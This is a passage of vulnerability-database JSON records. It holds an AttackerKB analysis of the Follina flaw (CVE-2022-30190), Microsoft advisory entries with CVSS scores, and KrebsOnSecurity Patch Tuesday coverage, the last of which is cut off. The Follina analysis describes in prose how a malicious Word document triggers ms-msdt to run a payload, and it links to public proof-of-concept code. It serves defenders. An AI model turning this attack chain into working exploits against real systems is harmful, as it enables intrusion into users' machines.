<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>\n\nThis is a relatively new vulnerability in the Microsoft Support Diagnostic Tool Vulnerability, so it is likely more information will come out in the coming days. \nCurrently, as seen in the wild, this vulnerability is embedded in a word document and likely distributed with a *.rar file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool Vulnerability) protocol which is then coerced into launching a command. \nAs reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accomplanying `*.rar` file and pulls a base64 encoded `*.cab` file from it, then expands the *cab file and runs a file contained in the cab file called `rgb.exe` THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECCOMMEND POLICING FOR IT WITHOUT OTHER RULES. \nMicrosoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/> \nUsers are required to delete a single registry key called `HKEY_CLASSES_ROOT\\ms-msdt` though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload. \nFurther reading: \n<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e> \nUntested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py> \n<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>\n\nUPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just viewing the file in the preview pane with explorer.exe. (details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post)\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-30190", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-02T00:00:00", "id": "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "href": "https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-06-14T15:25:08", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-38633.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-36963", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36963", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:00", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38671, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-38667", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:00", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-38671", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:00", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-38671.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-08-16T07:00:00", "id": "MS:CVE-2021-40447", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:09", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36963, CVE-2021-38633.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-36955", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36955", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:05", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-36963.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-38633", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38633", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:02", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36975.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-38639", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:06", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38639.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-36975", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:07", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-36965", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:03", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Open Management Infrastructure Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-20T07:00:00", "id": "MS:CVE-2021-38647", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:09", "description": "Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nAn attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: \u201cSuspicious Cpl File Execution\u201d.\n\nUpon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.\n\nPlease see the **Mitigations** and **Workaround** sections for important information about steps you can take to protect your system from this vulnerability.\n\n**UPDATE** September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mscve", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-16T07:00:00", "id": "MS:CVE-2021-40444", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-09-26T09:25:20", "description": "**Microsoft** today pushed software updates to plug dozens of security holes in Windows and related products, including a vulnerability that is already being exploited in active attacks. Also, **Apple** has issued an emergency update to fix a flaw that&#x27;s reportedly been abused to install spyware on **iOS** products, and **Google**&#x27;s got a new version of **Chrome** that tackles two zero-day flaws. Finally, Adobe has released critical security updates for **Acrobat**, **Reader** and a slew of other software.\n\n\n\nFour of the flaws fixed in this patch batch earned Microsoft&#x27;s most-dire &quot;critical&quot; rating, meaning they could be exploited by miscreants or malware to remotely compromise a Windows PC with little or no help from the user.\n\nTop of the critical heap is [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), which affects the \u201cMSHTML\u201d component of **Internet Explorer** (IE) on **Windows 10** and many **Windows Server** versions. In [a security advisory last week](<https://krebsonsecurity.com/2021/09/microsoft-attackers-exploiting-windows-zero-day-flaw/>), Microsoft warned attackers already are exploiting the flaw through **Microsoft Office** applications as well as IE.\n\nThe critical bug [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>) is interesting, as it involves a remote code execution flaw in &quot;WLAN AutoConfig,&quot; the component in Windows 10 and many Server versions that handles auto-connections to Wi-Fi networks. One mitigating factor here is that the attacker and target would have to be on the same network, although many systems are configured to auto-connect to Wi-Fi network names with which they have previously connected.\n\n**Allan Liska**, senior security architect at [Recorded Future](<https://www.recordedfuture.com>), said a similar vulnerability -- [CVE-2021-28316](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28316>) -- was announced in April.\n\n&quot;CVE-2021-28316 was a security bypass vulnerability, not remote code execution, and it has never been reported as publicly exploited,&quot; Liska said. &quot;That being said, the ubiquity of systems deployed with WLAN AutoConfig enabled could make it an attractive target for exploitation.&quot;\n\nAnother critical weakness that enterprises using Azure should prioritize is [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>), which is a remote code execution bug in Azure Open Management Infrastructure (OMI) that has a CVSS Score of 9.8 (10 is the worst). It was [reported and detailed](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) by researchers at **Wiz.io**, who said CVE-2021-38647 was one of four bugs in Azure OMI they found that Microsoft patched this week.\n\n&quot;We conservatively estimate that thousands of Azure customers and millions of endpoints are affected,&quot; Wiz.io&#x27;s [Nir Ohfeld](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>) wrote. &quot;In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk.&quot;\n\nKevin** Breen** of [Immersive Labs](<https://www.immersivelabs.com/>) calls attention to several &quot;privilege escalation&quot; flaws fixed by Microsoft this month, noting that while these bugs carry lesser severity ratings, Microsoft considers them more likely to be exploited by bad guys and malware.\n\n&quot;[CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>) have also been listed as &#x27;exploitation more likely&#x27; and together cover the full range of supported Windows versions,&quot; Breem wrote. &quot;I am starting to feel like a broken record when talking about privilege escalation vulnerabilities. They typically have a lower CVSS score than something like Remote Code Execution, but these local exploits can be the linchpin in the post-exploitation phases of an experienced attacker. If you can block them here you have the potential to significantly limit their damage. If we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching these is even more important than patching some other Remote Code execution vulnerabilities.&quot;\n\nApple on Monday pushed out [an urgent security update](<https://support.apple.com/en-us/HT212807>) to fix a &quot;zero-click&quot; iOS vulnerability ([CVE-2021-30860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30860>)) reported by researchers at **Citizen Lab** that allows commands to be run when files are opened on certain Apple devices. [Citizen Lab found](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) that an exploit for CVE-2021-30860 was being used by the [NSO Group](<https://en.wikipedia.org/wiki/NSO_Group>), an Israeli tech company whose spyware enables the remote surveillance of smartphones.\n\n**Google** also released [a new version](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) of its **Chrome** browser on Monday to fix nine vulnerabilities, including two that are under active attack. If you&#x27;re running Chrome, keep a lookout for when you see an &quot;Update&quot; tab appear to the right of the address bar. If it&#x27;s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAs it usually does on Patch Tuesday, Adobe also released new versions of Reader, Acrobat and [a large number of other products](<https://helpx.adobe.com/security.html>). Adobe says it is not aware of any exploits in the wild for any of the issues addressed in its updates today.\n\nFor a complete rundown of all patches released today and indexed by severity, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+September+2021+Patch+Tuesday/27834/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2021/september-2021-its-patch-day/>) usually has the lowdown on any patches that are causing problems for Windows users.\n\nOn that note, before you update _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-14T21:00:42", "type": "krebs", "title": "Microsoft Patch Tuesday, September 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28316", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-14T21:00:42", "id": "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "href": "https://krebsonsecurity.com/2021/09/microsoft-patch-tuesday-september-2021-edition/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T09:25:19", "description": "**Microsoft Corp.** warns that attackers are exploiting a previously unknown vulnerability in **Windows 10** and many **Windows Server** versions to seize control over PCs when users open a malicious document or visit a booby-trapped website. There is currently no official patch for the flaw, but Microsoft has released recommendations for mitigating the threat.\n\n\n\nAccording to [a security advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) from Redmond, the security hole 